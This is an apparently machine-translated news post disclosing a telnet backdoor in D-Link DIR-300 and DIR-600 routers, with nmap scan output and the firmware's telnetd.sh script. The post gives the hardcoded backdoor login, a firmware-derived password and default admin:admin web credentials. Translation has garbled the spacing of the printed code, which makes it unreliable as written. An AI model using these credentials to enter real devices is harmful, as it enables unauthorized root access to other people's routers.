Backdoor on D-Link routers

    In a router D-Link (DIR-300revA, DIR-300revB, DIR-600revB) detected backdoor .

    A German researcher scanned some D-Link nmap devices and discovered open port 23 \ tcp ( telnet ).


    Nmap scan results
    root @ bt: ~ # nmap -sSV -p 23 192.168.178.133,144,222
    Starting Nmap 6.01 ( nmap.org ) at 2013-04-30 13:42 CEST
    Nmap scan report for 192.168.178.133
    Host is up (0.0067s latency) .
    PORT STATE SERVICE VERSION
    23 / tcp open telnet D-Link 524, DIR-300, or WBR-1310 WAP telnetd
    MAC Address: 1C: BD: B9: A7: 7F: 74 (D-link International PTE Limited)
    Service Info: Device : WAP

    Nmap scan report for 192.168.178.144
    Host is up (0.0068s latency).
    PORT STATE SERVICE VERSION
    23 / tcp open telnet D-Link 524, DIR-300, or WBR-1310 WAP telnetd
    MAC Address: 00: 26: 5A: 38: 7D: 77 (D-Link)
    Service Info: Device: WAP

    Nmap scan report for 192.168.178.222
    Host is up (0.0031s latency).
    PORT STATE SERVICE VERSION
    23 / tcp open telnet D-Link 524, DIR-300, or WBR-1310 WAP telnetd
    MAC Address: 34: 08: 04: DB: 6D: FE (D-Link)
    Service Info: Device: WAP


    Porsle this researcher looked into the config file and found
    code for backdoor function
    ./rootfs/etc/scripts/misc/telnetd.sh
    #! / bin / sh
    image_sign = `cat / etc / config / image_sign`
    TELNETD =` rgdb -g / sys / telnetd`
    if ["$ TELNETD" = "true "]; then
    echo "Start telnetd ..."> / dev / console
    if [-f "/ usr / sbin / login"]; then
    lf = `rgdb -i -g / runtime / layout / lanif`
    telnetd -l" / usr / sbin / login "-u Alphanetworks: $ image_sign -i $ lf &
    else
    telnetd &
    fi
    fi
    root @ bt: ~ / firmware / DIR300-extracted # cat rootfs / etc / config / image_sign
    wrgg19_c_dlwbr_dir300


    Those. the password depends on the firmware version in the device. What does this password give root privileges for the device (see the picture below):



    Having received the root password, you can also
    detect in the device login \ password to the web interface of the device in clear form

    # cat var / etc / httpasswd
    admin: admin

    or so:


    I must say that this researcher is not the first time picking D-Link equipment and informing the manufacturer about bugs . However, D-Link is somehow not always in a hurry to close them. Or even declares that there will be no fix, because in their opinion, this is not a problem in their equipment, but in the browsers and users of their devices themselves.

    A source

    Also popular now: